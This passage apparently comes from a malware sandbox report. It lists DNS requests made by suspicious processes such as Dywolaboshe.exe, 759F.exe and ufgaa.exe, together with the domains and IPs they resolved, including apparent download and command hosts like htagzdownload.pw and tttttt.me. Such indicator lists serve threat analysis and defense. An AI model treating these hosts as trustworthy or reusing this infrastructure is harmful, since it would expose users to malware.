                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01452599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01452599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01462599908032135.site

                                                                                          DNS Response

                                                                                          82.118.23.111

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          api.ip.sb
                                                                                          dns
                                                                                          26F0.exe
                                                                                          55 B
                                                                                          145 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          api.ip.sb

                                                                                          DNS Response

                                                                                          104.26.13.31
                                                                                          104.26.12.31
                                                                                          172.67.75.172

                                                                                        • 8.8.8.8:53
                                                                                          nusurtal4f.net
                                                                                          dns
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          nusurtal4f.net

                                                                                          DNS Response

                                                                                          5.61.43.76

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          menzbv.pw
                                                                                          dns
                                                                                          55 B
                                                                                          71 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          menzbv.pw

                                                                                          DNS Response

                                                                                          111.90.146.149

                                                                                        • 8.8.8.8:53
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          dns
                                                                                          82 B
                                                                                          119 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com

                                                                                          DNS Response

                                                                                          52.218.106.72

                                                                                        • 8.8.8.8:53
                                                                                          g-partners.live
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          171 B
                                                                                          419 B
                                                                                          3
                                                                                          3

                                                                                          DNS Request

                                                                                          g-partners.live

                                                                                          DNS Response

                                                                                          176.113.115.136

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          loat.info
                                                                                          dns
                                                                                          55 B
                                                                                          87 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          loat.info

                                                                                          DNS Response

                                                                                          172.67.208.9
                                                                                          104.21.53.24

                                                                                        • 8.8.8.8:53
                                                                                          requested404.com
                                                                                          dns
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          62 B
                                                                                          78 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          requested404.com

                                                                                          DNS Response

                                                                                          63.250.33.126

                                                                                        • 8.8.8.8:53
                                                                                          www.zzepms.com
                                                                                          dns
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.zzepms.com

                                                                                          DNS Response

                                                                                          103.155.92.96

                                                                                        • 8.8.8.8:53
                                                                                          bitbucket.org
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          bitbucket.org

                                                                                          DNS Response

                                                                                          104.192.141.1

                                                                                        • 8.8.8.8:53
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          dns
                                                                                          76 B
                                                                                          142 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          bbuseruploads.s3.amazonaws.com

                                                                                          DNS Response

                                                                                          52.216.138.243

                                                                                        • 8.8.8.8:53
                                                                                          www.listincode.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          64 B
                                                                                          80 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.listincode.com

                                                                                          DNS Response

                                                                                          144.202.76.47

                                                                                        • 8.8.8.8:53
                                                                                          connectini.net
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          connectini.net

                                                                                          DNS Response

                                                                                          162.0.210.44

                                                                                        • 8.8.8.8:53
                                                                                          statuse.digitalcertvalidation.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          79 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          statuse.digitalcertvalidation.com

                                                                                          DNS Response

                                                                                          72.21.91.29

                                                                                        • 8.8.8.8:53
                                                                                          iplogger.org
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iplogger.org

                                                                                          DNS Response

                                                                                          88.99.66.31

                                                                                        • 8.8.8.8:53
                                                                                          requested404.com
                                                                                          dns
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          62 B
                                                                                          78 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          requested404.com

                                                                                          DNS Response

                                                                                          63.250.33.126

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.iyiqian.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.iyiqian.com

                                                                                          DNS Response

                                                                                          103.155.92.58

                                                                                        • 8.8.8.8:53
                                                                                          www.tinyore.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.tinyore.com

                                                                                          DNS Response

                                                                                          188.225.87.175

                                                                                        • 8.8.8.8:53
                                                                                          privateinvestig8tor.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          69 B
                                                                                          85 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          privateinvestig8tor.com

                                                                                          DNS Response

                                                                                          162.0.220.187

                                                                                        • 8.8.8.8:53
                                                                                          iplogger.org
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iplogger.org

                                                                                          DNS Response

                                                                                          88.99.66.31

                                                                                        • 8.8.8.8:53
                                                                                          microsoft.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          59 B
                                                                                          139 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft.com

                                                                                          DNS Response

                                                                                          104.215.148.63
                                                                                          40.76.4.15
                                                                                          40.112.72.205
                                                                                          40.113.200.201
                                                                                          13.77.161.179

                                                                                        • 8.8.8.8:53
                                                                                          api.ip.sb
                                                                                          dns
                                                                                          26F0.exe
                                                                                          55 B
                                                                                          145 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          api.ip.sb

                                                                                          DNS Response

                                                                                          104.26.12.31
                                                                                          104.26.13.31
                                                                                          172.67.75.172

                                                                                        • 8.8.8.8:53
                                                                                          microsoft.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          59 B
                                                                                          113 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft.com

                                                                                        • 8.8.8.8:53
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          87 B
                                                                                          119 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Response

                                                                                          104.47.53.36
                                                                                          40.93.212.0

                                                                                        • 8.8.8.8:53
                                                                                          connectini.net
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          connectini.net

                                                                                          DNS Response

                                                                                          162.0.210.44

                                                                                        • 8.8.8.8:53
                                                                                          google.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          56 B
                                                                                          72 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.com

                                                                                          DNS Response

                                                                                          172.217.168.206

                                                                                        • 8.8.8.8:53
                                                                                          sergeevih43.tumblr.com
                                                                                          dns
                                                                                          31DF.exe
                                                                                          68 B
                                                                                          100 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          sergeevih43.tumblr.com

                                                                                          DNS Response

                                                                                          74.114.154.22
                                                                                          74.114.154.18

                                                                                        • 8.8.8.8:53
                                                                                          g-partners.live
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          g-partners.live

                                                                                          DNS Response

                                                                                          176.113.115.136

                                                                                        • 8.8.8.8:53
                                                                                          d.jumpstreetboys.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          66 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          d.jumpstreetboys.com

                                                                                          DNS Response

                                                                                          172.67.222.38
                                                                                          104.21.62.88

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          cache.uutww77.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          63 B
                                                                                          95 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          cache.uutww77.com

                                                                                          DNS Response

                                                                                          172.67.171.54
                                                                                          104.21.29.4

                                                                                        • 8.8.8.8:53
                                                                                          a.xyzgame.vip
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          59 B
                                                                                          91 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          a.xyzgame.vip

                                                                                          DNS Response

                                                                                          104.21.40.13
                                                                                          172.67.173.218

                                                                                        • 8.8.8.8:53
                                                                                          b.xyzgame.cc
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          58 B
                                                                                          90 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          b.xyzgame.cc

                                                                                          DNS Response

                                                                                          172.67.178.136
                                                                                          104.21.51.99

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          ip-api.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          56 B
                                                                                          72 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ip-api.com

                                                                                          DNS Response

                                                                                          208.95.112.1

                                                                                        • 8.8.8.8:53
                                                                                          fb.xiaomishop.me
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          fb.xiaomishop.me

                                                                                          DNS Response

                                                                                          104.18.9.171
                                                                                          104.18.8.171

                                                                                        • 8.8.8.8:53
                                                                                          www.bandersajtebrauch.club
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          72 B
                                                                                          146 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.bandersajtebrauch.club

                                                                                        • 8.8.8.8:53
                                                                                          www.facebook.com
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          62 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.facebook.com

                                                                                          DNS Response

                                                                                          31.13.83.36

                                                                                        • 8.8.8.8:53
                                                                                          privacytoolsforyoufree.xyz
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          72 B
                                                                                          88 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          privacytoolsforyoufree.xyz

                                                                                          DNS Response

                                                                                          82.118.23.111

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          1privacytoolsforyou.site
                                                                                          dns
                                                                                          70 B
                                                                                          135 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          1privacytoolsforyou.site

                                                                                        • 8.8.8.8:53
                                                                                          www.profitabletrustednetwork.com
                                                                                          dns
                                                                                          78 B
                                                                                          126 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.profitabletrustednetwork.com

                                                                                          DNS Response

                                                                                          192.243.59.13
                                                                                          192.243.59.20
                                                                                          192.243.59.12

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          google.vrthcobj.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          65 B
                                                                                          81 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.vrthcobj.com

                                                                                          DNS Response

                                                                                          34.97.69.225

                                                                                        • 8.8.8.8:53
                                                                                          google.vrthcobj.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          65 B
                                                                                          133 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.vrthcobj.com

                                                                                        • 34.97.69.225:53
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          65.1kB
                                                                                          693.1kB
                                                                                          1241
                                                                                          1251
                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          uyg5wye.2ihsfa.com
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          64 B
                                                                                          80 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          uyg5wye.2ihsfa.com

                                                                                          DNS Response

                                                                                          88.218.92.148

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          dns
                                                                                          71 B
                                                                                          129 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.in-addr.arpa

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          x1.c.lencr.org
                                                                                          dns
                                                                                          60 B
                                                                                          165 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          x1.c.lencr.org

                                                                                          DNS Response

                                                                                          104.73.131.204

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          iw.gamegame.info
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iw.gamegame.info

                                                                                          DNS Response

                                                                                          104.21.21.221
                                                                                          172.67.200.215

                                                                                        • 8.8.8.8:53
                                                                                          venetrigni.com
                                                                                          dns
                                                                                          60 B
                                                                                          92 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          venetrigni.com

                                                                                          DNS Response

                                                                                          52.20.18.214
                                                                                          54.227.178.166

                                                                                        • 8.8.8.8:53
                                                                                          ol.gamegame.info
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ol.gamegame.info

                                                                                          DNS Response

                                                                                          104.21.21.221
                                                                                          172.67.200.215

                                                                                        • 8.8.8.8:53
                                                                                          trk.lemon-ade.site
                                                                                          dns
                                                                                          64 B
                                                                                          131 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          trk.lemon-ade.site

                                                                                          DNS Response

                                                                                          3.210.231.22
                                                                                          54.210.38.13

                                                                                        • 8.8.8.8:53
                                                                                          afflat3d1.com
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          afflat3d1.com

                                                                                          DNS Response

                                                                                          69.172.200.185

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          iceanedy.com
                                                                                          dns
                                                                                          58 B
                                                                                          90 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iceanedy.com

                                                                                          DNS Response

                                                                                          172.67.214.126
                                                                                          104.21.86.39

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          kodim.rdtk.io
                                                                                          dns
                                                                                          59 B
                                                                                          89 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          kodim.rdtk.io

                                                                                          DNS Response

                                                                                          23.105.36.164

                                                                                        • 8.8.8.8:53
                                                                                          www.utopia-network.org
                                                                                          dns
                                                                                          68 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.utopia-network.org

                                                                                          DNS Response

                                                                                          162.0.209.78

                                                                                        • 8.8.8.8:53
                                                                                          kit.fontawesome.com
                                                                                          dns
                                                                                          65 B
                                                                                          149 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          kit.fontawesome.com

                                                                                          DNS Response

                                                                                          104.18.22.52
                                                                                          104.18.23.52

                                                                                        • 8.8.8.8:53
                                                                                          unpkg.com
                                                                                          dns
                                                                                          55 B
                                                                                          135 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          unpkg.com

                                                                                          DNS Response

                                                                                          104.16.126.175
                                                                                          104.16.125.175
                                                                                          104.16.122.175
                                                                                          104.16.124.175
                                                                                          104.16.123.175

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          stats.g.doubleclick.net
                                                                                          dns
                                                                                          69 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          stats.g.doubleclick.net

                                                                                          DNS Response

                                                                                          142.250.102.156
                                                                                          142.250.102.157
                                                                                          142.250.102.155
                                                                                          142.250.102.154

                                                                                        • 8.8.8.8:53
                                                                                          www.google.nl
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.google.nl

                                                                                          DNS Response

                                                                                          172.217.168.227

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

